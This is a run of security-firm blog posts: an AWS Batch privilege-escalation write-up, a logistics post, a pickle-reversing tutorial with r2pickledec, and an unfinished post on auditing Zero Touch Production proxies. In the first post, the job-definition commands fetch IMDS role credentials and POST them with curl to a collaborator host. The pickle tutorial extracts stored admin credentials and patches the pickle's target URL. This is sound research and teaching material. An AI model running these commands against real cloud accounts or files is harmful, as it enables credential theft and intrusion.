The exploitation phase required two job definitions to interact with the IMDSv2, one to get the instance IAM role name, and one to retrieve the IAM security credentials for the leaked role name.

Job Definition 1 - Getting the host EC2 Spot instance role name

$ aws batch register-job-definition --job-definition-name poc-get-rolename --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-
data/iam/security-credentials/ > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

After defining the job definition, submit a new job using the newly create job definition:

aws batch submit-job --job-name attacker-jb-getrolename --job-queue LowPriorityEc2 --job-definition poc-get-rolename --scheduling-priority-override 999 --share-identifier asd

Note: the job queue name was retrievable with aws batch describe-job-queues

The attacker collaborator server received something like:

POST /exfil HTTP/1.1
Host: fo78ichlaqnfn01sju2ck6ixwo2fqaez.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

iam-instance-role-20230322003148155300000001

Job Definition 2 - Getting the credentials for the host EC2 Spot instance role

$ aws batch register-job-definition --job-definition-name poc-get-aimcreds --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-
data/iam/security-credentials/ROLE_NAME > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

Like for the previous definition, by submitting the job, the collaborator received the output.

POST /exfil HTTP/1.1
Host: 4otxi1haafn4np1hjj21kvimwd24qyen.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 1430
Content-Type: application/x-www-form-urlencoded

{"RoleArn":"arn:aws:iam::1235122316123:role/ecs-role","AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>","Token":"<redacted>","Expiration":"2023-03-22T06:54:42Z"}

This time it contained the AWS credentials for the host EC2 Spot instance role.

Privilege escalation achieved! The obtained role allowed us to access other tenants’ data and do much more.

Default Host Network Mode In AWS Batch With EC2 Orchestration

In AWS Batch with EC2 compute environments, the containers run with bridged network mode.

With such configuration, the containers (batch jobs) have access to both the EC2 IMDS and the CMDS.

The issue lies in the fact that the container job is able to dialogue with the IMDSv2 service on behalf of the EC2 Spot instance because they share the same network interface.

In conclusion, it is very important to know about such behavior and avoid the possibility of introducing privilege escalation patterns while designing cloud environments.

For cloud security auditors

When the platform uses AWS Batch compute environments with EC2 orchestration, answer the following questions:

Always keep in consideration the security of the AWS Batch jobs and their possible compromise. A threat actor could escalate vertically/horizontally and gain more access into the cloud infrastructure.
- Which aspects of the job execution are controllable by the external user?
- Is command execution inside the jobs intended by the platform?
  - If yes, investigate the permissions available through the CMDS
  - If no, attempt to achieve command execution within the jobs’ context
- Is the IMDS restricted from the job execution context?
Which types of Compute Environments are used in the platform?
- Are there any Compute Environments configured with EC2 orchestration?
  - If yes, which role is assigned to EC2 Spot Instances?

Note: The dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with EC2 launch type.

For developers

Developers should be aware of the fact that AWS Batch with EC2 compute environments will run containers with host network configuration. Consequently, the executed containers (batch jobs) have access to both the CMDS for the task role and the IMDS for the host EC2 Spot Instance role.

In order to prevent privilege escalation patterns, Job runs must match the following configurations:

Having the IMDS restricted at network level in running jobs. Read the documentation here
Restricting the batch job execution role and job role IAM permissions. In particular, avoid assigning RegisterJobDefinition and SubmitJob permissions in job-related or accessible policies to prevent uncontrolled execution by attackers landing on the job context

If both configurations are not applicable in your design, consider changing the orchestration type.

Note: Once again, the dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with the EC2 launch type.

Hands-On IaC Lab

Stay tuned for the next episode!

Resources

Logistics for a Remote Company

2023-06-06T00:00:00+02:00

Logistics and shipping devices across the world can be a challenging task, especially when dealing with customs regulations. For the past few years, I have had the opportunity to learn about these complex processes and how to manage them efficiently. As a Practice Manager at Doyensec, I was responsible for building processes from scratch and ensuring that our logistics operations ran smoothly.

Since 2018, I have had to navigate the intricate world of logistics and shipping, dealing with everything from international regulations to customs clearance. Along the way, I have learned valuable lessons and picked up essential skills that have helped me manage complex logistics operations with ease.

In this post, I will share my experiences and insights on managing shipping devices across the world, dealing with customs, and building efficient logistics processes. Whether you’re new to logistics or looking to improve your existing operations, my learnings and experiences will prove useful.

Employee Onboarding

At Doyensec, when we hire a new employee, our HR specialist takes care of all the necessary paperwork, while I focus on logistics. This includes creating a welcome package and shipping all the necessary devices to the employee’s location. While onboarding employees from the United States and European Union is relatively easy, dealing with customs regulations in other countries can be quite challenging.

For instance, shipping devices from/to countries such as the UK (post Brexit), Turkey, or Argentina can be quite complicated. We need to be aware of the customs regulations in these countries to ensure that our devices are not bounced back or charged with exorbitant custom fees.

Navigating customs regulations in different countries can be a daunting task. Still, we’ve learned that conducting thorough research beforehand and ensuring that our devices comply with the necessary regulations can help avoid any unnecessary delays or fees. At Doyensec, we believe that providing our employees with the necessary tools and equipment to perform their job is essential, and we strive to make this process as seamless as possible, regardless of where the employee is located.

Testing Hardware Management

At Doyensec, dealing with testing hardware is a crucial aspect of our operations. We use a variety of testing equipment for our work. This means that we often have to navigate customs regulations, including the payment of customs fees, to ensure that our laptops, Yubikeys and mobile devices arrive on time.

To avoid delays in conducting security audits, we often choose to pay additional fees, including VAT and customs charges, to ensure that we receive hardware promptly. We understand that time is of the essence, and we prioritize meeting our clients’ needs, even if it means spending more money to ensure items required for testing are not held up at customs.

In addition to paying customs fees, we also make sure to keep all necessary documentation for each piece of hardware that we manage. This documentation helps us to speed up further processes and ensures that we can quickly identify and locate each and every piece of hardware when needed.

The hardware we most frequently deal with are laptops, though we also occasionally receive YubiKeys as well. Fortunately, YubiKeys generally do not cause any problems at customs (low market value), and we can usually receive them without any significant issues.

Over time, we’ve learned that different shipping companies have different approaches to customs regulations. To ensure that we can deliver quality service to our clients, we prefer to use companies that we know will treat us fairly and deliver hardware on time. We have almost always had a positive experience with DHL as our preferred shipping provider. DHL’s automated custom processes and documentation have been particularly helpful in ensuring smooth and efficient shipping of Doyensec’s hardware and documents across the world. DHL’s reliability and efficiency have been critical in allowing Doyensec to focus on its core business, which is finding bugs for our fantastic clients.

We have a preference for avoiding local post office services when it comes to shipping our hardware or documents. While local post office services may be slightly cheaper, they often come with more problems. Packages may get stuck somewhere during the delivery process, and it can be difficult to follow up with customer service to resolve the issue. This can lead to delayed deliveries, frustrated customers, and ultimately, a negative impact on the company’s reputation. Therefore, Doyensec opts for more reliable shipping options, even if they come with a slightly higher price tag.

2022 Holiday Gifts from Japan

At Doyensec, we believe in showing appreciation for our employees and their hard work. That’s why we decided to import some gifts from Japan to distribute among our team members. However, what we did not anticipate was the range of custom fees that we would encounter while shipping these gifts to different countries.

We shipped these gifts to 7 different countries, all through the same shipping company. However, we found that custom officers had different approaches even within the same country. This resulted in a range of custom fees, ranging from 0 to 45 euros, for each package.

The interesting part was that every package had the same invoice from the Japanese manufacturer attached, but the fees still differed significantly. It was challenging to understand why this was the case, and we still don’t have a clear answer.

Overall, our experience with importing gifts from Japan highlighted the importance of being prepared for unexpected customs fees and the unpredictability of customs regulations.

Conclusion

Managing devices and shipping packages to team members at a globally distributed company, even with a small team, can be quite challenging. Ensuring that packages are delivered promptly and to the correct location can be very difficult, especially with tight project deadlines.

Although it would be easier to manage devices if everyone worked from the same office, at Doyensec, we value remote work and the flexibility that it provides. That’s why we have invested in developing processes and protocols to ensure that our devices are managed efficiently and securely, despite the remote working environment.

While some may argue that these challenges are reason enough to abandon remote work and return to the office, we believe that the benefits of remote work far outweigh any challenges we may face. At Doyensec, remote work allows us to hire talented individuals from all the EU and US/Canada, offering a diverse and inclusive work environment. Remote work also allows for greater flexibility and work-life balance, which can result in happier and more productive employees.

In conclusion, while managing devices in a remote work environment can be challenging, we believe that the benefits of remote work make it worthwhile. At Doyensec, we have developed strategies to manage devices efficiently, and we continue to support remote work and its many benefits.

Reversing Pickles with r2pickledec

2023-06-01T00:00:00+02:00

R2pickledec is the first pickle decompiler to support all instructions up to protocol 5 (the current). In this post we will go over what Python pickles are, how they work and how to reverse them with Radare2 and r2pickledec. An upcoming blog post will go even deeper into pickles and share some advanced obfuscation techniques.

What are pickles?

Pickles are the built-in serialization algorithm in Python. They can turn any Python object into a byte stream so it may be stored on disk or sent over a network. Pickles are notoriously dangerous. You should never unpickle data from an untrusted source. Doing so will likely result in remote code execution. Please refer to the documentation for more details.

Pickle Basics

Pickles are implemented as a very simple assembly language. There are only 68 instructions and they mostly operate on a stack. The instruction names are pretty easy to understand. For example, the instruction empty_dict will push an empty dictionary onto the stack.

The stack only allows access to the top item, or items in some cases. If you want to grab something else, you must use the memo. The memo is implemented as a dictionary with positive integer indexes. You will often see memoize instructions. Naively, the memoize instruction will copy the item at the top of the stack into the next index in the memo. Then, if that item is needed later, a binget n can be used to get the object at index n.

To learn more about pickles, I recommend playing with some pickles. Enable descriptions in Radare2 with e asm.describe = true to get short descriptions of each instruction. Decompile simple pickles that you build yourself, and see if you can understand the instructions.

Installing Radare2 and r2pickledec

For reversing pickles, our tool of choice is Radare2 (r2 for short). Package managers tend to ship really old r2 versions. In this case it’s probably fine, I added the pickle arch to r2 a long time ago. But if you run into any bugs I suggest installing from source.

In this blog post, we will primarily be using our R2pickledec decompiler plugin. I purposely wrote this plugin to only rely on r2 libraries. So if r2 works on your system, r2pickledec should work too. You should be able to instal with r2pm.

$ r2pm -U             # update package db
$ r2pm -ci pickledec  # clean install

You can verify everything worked with the following command. You should see the r2pickledec help menu.

$ r2 -a pickle -qqc 'pdP?' -
Usage: pdP[j]  Decompile python pickle
| pdP   Decompile python pickle until STOP, eof or bad opcode
| pdPj  JSON output
| pdPf  Decompile and set pick.* flags from decompiled var names

Reversing a Real pickle with Radare2 and r2pickledec

Let’s reverse a real pickle. One never reverses without some context, so let’s imagine you just broke into a webserver. The webserver is intended to allow employees of the company to perform privileged actions on client accounts. While poking around, you find a pickle file that is used by the server to restore state. What interesting things might we find in the pickle?

The pickle appears below base64 encoded. Feel free to grab it and play along at home.

$ base64 -i /tmp/blog2.pickle -b 64
gASVDQYAAAAAAACMCF9fbWFpbl9flIwDQXBplJOUKYGUfZQojAdzZXNzaW9ulIwR
cmVxdWVzdHMuc2Vzc2lvbnOUjAdTZXNzaW9ulJOUKYGUfZQojAdoZWFkZXJzlIwT
cmVxdWVzdHMuc3RydWN0dXJlc5SME0Nhc2VJbnNlbnNpdGl2ZURpY3SUk5QpgZR9
lIwGX3N0b3JllIwLY29sbGVjdGlvbnOUjAtPcmRlcmVkRGljdJSTlClSlCiMCnVz
ZXItYWdlbnSUjApVc2VyLUFnZW50lIwWcHl0aG9uLXJlcXVlc3RzLzIuMjguMpSG
lIwPYWNjZXB0LWVuY29kaW5nlIwPQWNjZXB0LUVuY29kaW5nlIwNZ3ppcCwgZGVm
bGF0ZZSGlIwGYWNjZXB0lIwGQWNjZXB0lIwDKi8qlIaUjApjb25uZWN0aW9ulIwK
Q29ubmVjdGlvbpSMCmtlZXAtYWxpdmWUhpR1c2KMB2Nvb2tpZXOUjBByZXF1ZXN0
cy5jb29raWVzlIwRUmVxdWVzdHNDb29raWVKYXKUk5QpgZR9lCiMB19wb2xpY3mU
jA5odHRwLmNvb2tpZWphcpSME0RlZmF1bHRDb29raWVQb2xpY3mUk5QpgZR9lCiM
CG5ldHNjYXBllIiMB3JmYzI5NjWUiYwTcmZjMjEwOV9hc19uZXRzY2FwZZROjAxo
aWRlX2Nvb2tpZTKUiYwNc3RyaWN0X2RvbWFpbpSJjBtzdHJpY3RfcmZjMjk2NV91
bnZlcmlmaWFibGWUiIwWc3RyaWN0X25zX3VudmVyaWZpYWJsZZSJjBBzdHJpY3Rf
bnNfZG9tYWlulEsAjBxzdHJpY3RfbnNfc2V0X2luaXRpYWxfZG9sbGFylImMEnN0
cmljdF9uc19zZXRfcGF0aJSJjBBzZWN1cmVfcHJvdG9jb2xzlIwFaHR0cHOUjAN3
c3OUhpSMEF9ibG9ja2VkX2RvbWFpbnOUKYwQX2FsbG93ZWRfZG9tYWluc5ROdWKM
CF9jb29raWVzlH2UdWKMBGF1dGiUjAVhZG1pbpSMD1BpY2tsZXMgYXJlIGZ1bpSG
lIwHcHJveGllc5R9lIwFaG9va3OUfZSMCHJlc3BvbnNllF2Uc4wGcGFyYW1zlH2U
jAZ2ZXJpZnmUiIwEY2VydJROjAhhZGFwdGVyc5RoFClSlCiMCGh0dHBzOi8vlIwR
cmVxdWVzdHMuYWRhcHRlcnOUjAtIVFRQQWRhcHRlcpSTlCmBlH2UKIwLbWF4X3Jl
dHJpZXOUjBJ1cmxsaWIzLnV0aWwucmV0cnmUjAVSZXRyeZSTlCmBlH2UKIwFdG90
YWyUSwCMB2Nvbm5lY3SUTowEcmVhZJSJjAZzdGF0dXOUTowFb3RoZXKUTowIcmVk
aXJlY3SUTowQc3RhdHVzX2ZvcmNlbGlzdJSPlIwPYWxsb3dlZF9tZXRob2RzlCiM
BVRSQUNFlIwGREVMRVRFlIwDUFVUlIwDR0VUlIwESEVBRJSMB09QVElPTlOUkZSM
DmJhY2tvZmZfZmFjdG9ylEsAjBFyYWlzZV9vbl9yZWRpcmVjdJSIjA9yYWlzZV9v
bl9zdGF0dXOUiIwHaGlzdG9yeZQpjBpyZXNwZWN0X3JldHJ5X2FmdGVyX2hlYWRl
cpSIjBpyZW1vdmVfaGVhZGVyc19vbl9yZWRpcmVjdJQojA1hdXRob3JpemF0aW9u
lJGUdWKMBmNvbmZpZ5R9lIwRX3Bvb2xfY29ubmVjdGlvbnOUSwqMDV9wb29sX21h
eHNpemWUSwqMC19wb29sX2Jsb2NrlIl1YowHaHR0cDovL5RoVymBlH2UKGhaaF0p
gZR9lChoYEsAaGFOaGKJaGNOaGROaGVOaGaPlGhoaG9ocEsAaHGIaHKIaHMpaHSI
aHUojA1hdXRob3JpemF0aW9ulJGUdWJoeH2UaHpLCmh7SwpofIl1YnWMBnN0cmVh
bZSJjAl0cnVzdF9lbnaUiIwNbWF4X3JlZGlyZWN0c5RLHnVijAdiYXNldXJslIwU
aHR0cHM6Ly9leGFtcGxlLmNvbS+UdWIu

We decode the pickle and put it in a file, lets call it test.pickle. We then open the file with r2. We also run x to see some hex and pd to print dissassembly. If you ever want to know what an r2 command does, just run the command but append a ? to the end to get a help menu (e.g., pd?).

$ r2 -a pickle test.pickle
 -- .-. .- -.. .- .-. . ..---
[0x00000000]> x
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000000  8004 95bf 0500 0000 0000 008c 1172 6571  .............req
0x00000010  7565 7374 732e 7365 7373 696f 6e73 948c  uests.sessions..
0x00000020  0753 6573 7369 6f6e 9493 9429 8194 7d94  .Session...)..}.
0x00000030  288c 0768 6561 6465 7273 948c 1372 6571  (..headers...req
0x00000040  7565 7374 732e 7374 7275 6374 7572 6573  uests.structures
0x00000050  948c 1343 6173 6549 6e73 656e 7369 7469  ...CaseInsensiti
0x00000060  7665 4469 6374 9493 9429 8194 7d94 8c06  veDict...)..}...
0x00000070  5f73 746f 7265 948c 0b63 6f6c 6c65 6374  _store...collect
0x00000080  696f 6e73 948c 0b4f 7264 6572 6564 4469  ions...OrderedDi
0x00000090  6374 9493 9429 5294 288c 0a75 7365 722d  ct...)R.(..user-
0x000000a0  6167 656e 7494 8c0a 5573 6572 2d41 6765  agent...User-Age
0x000000b0  6e74 948c 1670 7974 686f 6e2d 7265 7175  nt...python-requ
0x000000c0  6573 7473 2f32 2e32 382e 3294 8694 8c0f  ests/2.28.2.....
0x000000d0  6163 6365 7074 2d65 6e63 6f64 696e 6794  accept-encoding.
0x000000e0  8c0f 4163 6365 7074 2d45 6e63 6f64 696e  ..Accept-Encodin
0x000000f0  6794 8c0d 677a 6970 2c20 6465 666c 6174  g...gzip, deflat
[0x00000000]> pd
            0x00000000      8004           proto 0x4
            0x00000002      95bf05000000.  frame 0x5bf
            0x0000000b      8c1172657175.  short_binunicode "requests.sessions" ; 0xd
            0x0000001e      94             memoize
            0x0000001f      8c0753657373.  short_binunicode "Session"  ; 0x21 ; 2'!'
            0x00000028      94             memoize
            0x00000029      93             stack_global
            0x0000002a      94             memoize
            0x0000002b      29             empty_tuple
            0x0000002c      81             newobj
            0x0000002d      94             memoize
            0x0000002e      7d             empty_dict
            0x0000002f      94             memoize
            0x00000030      28             mark
            0x00000031      8c0768656164.  short_binunicode "headers"  ; 0x33 ; 2'3'
            0x0000003a      94             memoize
            0x0000003b      8c1372657175.  short_binunicode "requests.structures" ; 0x3d ; 2'='
            0x00000050      94             memoize
            0x00000051      8c1343617365.  short_binunicode "CaseInsensitiveDict" ; 0x53 ; 2'S'
            0x00000066      94             memoize
            0x00000067      93             stack_global

From the above assembly it appears this file is indeed a pickle. We also see requests.sessions and Session as strings. This pickle likely imports requests and uses sessions. Let’s decompile it. We will run the command pdPf @0 ~.... This takes some explaining though, since it uses a couple of r2’s features.

pdPf - R2pickledec uses the pdP command (see pdP?). Adding an f causes the decompiler to set r2 flags for every variable name. This will make renaming variables and jumping to interesting locations easier.
@0 - This tells r2 to run the command at offset 0 instead of the current seek address. This does not matter now because our current offset defaults to
1. I just make this a habit in general to prevent mistakes when I am seeking around to patch something.
~.. - This is the r2 version of |less. It uses r2’s built in pager. If you like the real less better, you can just use |less. R2 commands can be piped to any command line program.

Once we execute the command, we will see a Python-like source representation of the pickle. The code is seen below, but snipped. All comments below were added by the decompiler.

## VM stack start, len 1
## VM[0] TOP
str_xb = "__main__"
str_x16 = "Api"
g_Api_x1c = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)
str_x54 = "headers"
str_x5e = "requests.structures"
str_x74 = "CaseInsensitiveDict"
g_CaseInsensitiveDict_x8a = _find_class(str_x5e, str_x74)
str_x91 = "_store"
str_x9a = "collections"
str_xa8 = "OrderedDict"
g_OrderedDict_xb6 = _find_class(str_x9a, str_xa8)
str_xbc = "user-agent"
str_xc9 = "User-Agent"
str_xd6 = "python-requests/2.28.2"
tup_xef = (str_xc9, str_xd6)
str_xf1 = "accept-encoding"
...
str_x5c9 = "stream"
str_x5d3 = "trust_env"
str_x5e0 = "max_redirects"
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

It’s usually best to start reversing at the end with the return line. That is what is being returned from the pickle. Hit G to go to the end of the file. You will see the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

The what_x616 variable is getting returned. The what part of the variable indicates that the decompiler does not know what type of object this is. This is because what_x616 is the result of a g_Api_x1c.__new__ call. On the other hand, g_Api_x1c gets a g_ prefix. The decompiler knows this is a global, since it is from an import. It even adds the Api part in to hint at what the import it. The x1c and x616 indicate the offset in the pickle where the object was created. We will use that later to patch the pickle.

Since we used flags, we can easily rename variables by renaming the flag. It might be helpful to rename the g_Api_x1c to make it easier to search for. Rename the flag with fr pick.g_Api_x1c pick.api. Notice, the flag will tab complete. List all flags with the f command. See f? for help.

Now run pdP @0 ~.. again. Instead of g_Api_x1c you will see api. If we search for its first use, you will find the below code.

str_xb = "__main__"
str_x16 = "Api"
api = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)

Naively, _find_class(module, name) is equivalent to _getattribute(sys.modules[module], name)[0]. We can see the module is __main__ and the name is Api. So the api variable is just __main__.Api.

In this snippet of code, we see the request session being imported. You may have noticed the baseurl field in the previous snippet of code. Looks like this object contains a session for making backend API requests. Can we steal something good from it? Googling for “requests session basic authentication” turns up the auth attribute. Let’s look for “auth” in our pickle.

str_x30e = "auth"
str_x315 = "admin"
str_x31d = "Pickles are fun"
tup_x32f = (str_x315, str_x31d)
str_x331 = "proxies"
dict_x33b = {}
...
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}

It might be helpful to rename variables for understanding, or run pdP > /tmp/pickle_source.py to get a .py file to open in your favorite text editor. In short though, the above code sets up the dictionary dict_x51 where the auth element is set to the tuple ("admin", "Pickles are fun").

We just stole the admin credentials!

Patching

Now I don’t recommend doing this on a real pentest, but let’s take things farther. We can patch the pickle to use our own malicious webserver. We first need to find the current URL, so we search for “https” and find the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = api.__new__(g_Api_x1c, *())

So the baseurl of the API is being set to https://example.com/. To patch this, we seek to where the URL string is created. We can use the x5fe in the variable name to know where the variable was created, or we can just seek to the pick.str_x5e flag. When seeking to a flag in r2 you can tab complete the flag. Notice the prompt changes its location number after the seek command.

[0x00000000]> s pick.str_x5fe
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600

Let’s overwrite this URL with https://doyensec.com/. The below Radare2 commands are commented so you can understand what they are doing.

[0x000005fe]> oo+ # reopen file in read/write mode
[0x000005fe]> pd 3 # double check what next instructions should be
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600
            0x00000614      94             memoize
            0x00000615      75             setitems
[0x000005fe]> r+ 1 # add one extra byte to the file, since our new URL is slightly longer
[0x000005fe]> wa short_binunicode "https://doyensec.com/"
INFO: Written 23 byte(s) (short_binunicode "https://doyensec.com/") = wx 8c1568747470733a2f2f646f79656e7365632e636f6d2f @ 0x000005fe
[0x000005fe]> pd 3     # double check we did not clobber an instruction
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600
            0x00000615      94             memoize
            ;-- pick.what_x616:
            0x00000616      75             setitems
[0x000005fe]> pdP @0 |tail      # check that the patch worked
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://doyensec.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x617 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x617.__setstate__(dict_x21)
return what_x617

JSON and Automation

Imagine this is just the first of 100 files and you want to patch them all. Radare2 is easy to script with r2pipe. Most commands in r2 have a JSON variant by adding a j to the end. In this case, pdPj will produce an AST in JSON. This is complete with offsets. Using this you can write a parser that will automatically find the baseurl element of the returned api object, get the offset and patch it.

JSON can also be helpful without r2pipe. This is because r2 has a bunch of built-in features for dealing with JSON. For example, we can pretty print JSON with ~{}, but for this pickle it would produce 1492 lines of JSON. So better yet, use r2’s internal gron output with ~{=} and grep for what you want.

[0x000005fe]> pdPj @0 ~{=}https
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[1][1].value[1].args[0].value[0][1].value[1].args[0].value[10][1].value[0].value = "https";
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[8][1].value[1].args[0].value = "https://";
json.stack[0].value[1].args[0].value[1][1].value = "https://doyensec.com/";

Now we can go use the provided JSON path to find the offset of the doyensec.com URL.

[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].value}
https://doyensec.com/
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1]}
{"offset":1534,"type":"PY_STR","value":"https://doyensec.com/"}
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}
1534
[0x00000000]> s `pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}` ## seek to address using subcomand
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600

Don’t forget you can pipe to external commands. For example, pdPj |jq can be used to search the AST for different patterns. For example, you could return all objects where the type is PY_GLOBAL.

Conclusion

The r2pickledec plugin simplifies reversing of pickles. Because it is a r2 plugin, you get all the features of r2. We barely scratched the surface of what r2 can do. If you’d like to learn more, check out the r2 book. Be sure to keep an eye out for my next post where I will go into Python pickle obfuscation techniques.

Testing Zero Touch Production Platforms and Safe Proxies

2023-05-04T00:00:00+02:00

As more companies develop in-house services and tools to moderate access to production environments, the importance of understanding and testing these Zero Touch Production (ZTP) platforms grows ¹ ². This blog post aims to provide an overview of ZTP tools and services, explore their security role in DevSecOps, and outline common pitfalls to watch out for when testing them.

SRE? ZTP?
- Safe Proxies In Production
The safety & security roles of Safe Proxies
What does ZTP look like today
What to look for when auditing ZTP tools/services
Conclusions
References

SRE? ZTP?

“Every change in production must be either made by automation, prevalidated by software or made via audited break-glass mechanism.” – Seth Hettich, Former Production TL, Google

This terminology was popularized by Google’s DevOps teams and is the golden standard to this day. According to this picture, there are SREs, a selected group of engineers that can exclusively use their SSH production access to act when something breaks. But that access introduces reliability and security risks if they make a mistake or their accounts are compromised. To balance this risk, companies should automate the majority of the production operations while providing routes for manual changes when necessary. This is the basic reasoning behind what was introduced by the “Zero Touch Production” pattern.

Safe Proxies In Production

The “Safe Proxy” model refers to the tools that allow authorized persons to access or modify the state of physical servers, virtual machines, or particular applications. From the original definition:

At Google, we enforce this behavior by restricting the target system to accept only calls from the proxy through a configuration. This configuration specifies which application-layer remote procedure calls (RPCs) can be executed by which client roles through access control lists (ACLs). After checking the access permissions, the proxy sends the request to be executed via the RPC to the target systems. Typically, each target system has an application-layer program that receives the request and executes it directly on the system. The proxy logs all requests and commands issued by the systems it interacts with.

The safety & security roles of Safe Proxies

There are various outage scenarios prevented by ZTP (e.g., typos, cut/paste errors, wrong terminals, underestimating blast radius of impacted machines, etc.). On paper, it’s a great way to protect production from human errors affecting the availability, but it can also help to prevent some forms of malicious access. A typical scenario involves an SRE that is compromised or malicious and tries to do what an attacker would do with privileges. This could include bringing down or attacking other machines, compromising secrets, or scraping user data programmatically. This is why testing these services will become more and more important as the attackers will find them valuable and target them.

What does ZTP look like today

Many companies nowadays need these secure proxy tools to realize their vision, but they are all trying to reinvent the wheel in one way or another. This is because it’s an immature market and no off-the-shelf solutions exist. During the development, the security team is often included in the steering committee but may lack the domain-specific logic to build similar solutions. Another issue is that since usually the main driver is the DevOps team wanting operational safety, availability and integrity are prioritized at the expense of confidentiality. In reality, the ZTP framework development team should collaborate with SRE and security teams throughout the design and implementation phases, ensuring that security and reliability best practices are woven into the fabric of the framework and not just bolted on at the end.

Last but not least, these solutions are to this day suffering in their adoption rates and are subjected to lax intepretations (to a point where developers are the ones using these systems to access what they’re allowed to touch in production). These services are particularly juicy for both pentesters and attackers. It’s not an understatement to say that every actor compromising a box in a corporate environment should first look at these services to escalate their access.

What to look for when auditing ZTP tools/services

We compiled some of the most common issues we’ve encountered while testing ZTP implementations below:

A. Web Attack Surface

ZTP services often expose a web-based frontend for various purposes such as monitoring, proposing commands or jobs, and checking command output. These frontends are prime targets for classic web security vulnerabilities like Cross-Site Request Forgery (CSRF), Server-Side Request Forgery (SSRF), Insecure Direct Object References (IDORs), XML External Entity (XXE) attacks, and Cross-Origin Resource Sharing (CORS) misconfigurations. If the frontend is also used for command moderation, it presents an even more interesting attack surface.

B. Hooks

Webhooks are widely used in ZTP platforms due to their interaction with team members and on-call engineers. These hooks are crucial for the command approval flow ceremony and for monitoring. Attackers may try to manipulate or suppress any Pagerduty, Slack, or Microsoft Teams bot/hook notifications. Issues to look for include content spoofing, webhook authentication weaknesses, and replay attacks.

C. Safe Centralization

Safety checks in ZTP platforms are usually evaluated centrally. A portion of the solution is often hosted independently for availability, to evaluate the rules set by the SRE team. It’s essential to assess the security of the core service, as exploiting or polluting its visibility can affect the entire infrastructure’s availability (what if the service is down? who can access this service?).

In an hypotetical sample attack scenario, if a rule is set to only allow reboots of a certain percentage of the fleet, can an attacker pollute the fleet status and make the hosts look alive? This can be achieved with ping reply spoofing or via MITM in the case of plain HTTP health endpoints. Under these premises, network communications must be Zero Trust too to defend against this.

D. Insecure Default Templates

The templates for the policy configuration managing the access control for services are usually provided to service owners. These can be a source of errors themselves. Users should be guided to make the right choices by providing templates or automatically generating settings that are secure by default. For a full list of the design strategies presented, see the “Building Secure and Reliable Systems” bible ³.

E. Logging

Inconsistent or excessive logging retention of command outputs can be hazardous. Attackers might abuse discrepancies in logging retention to access user data or secrets logged in a given command or its results.

F. Rate-limiting

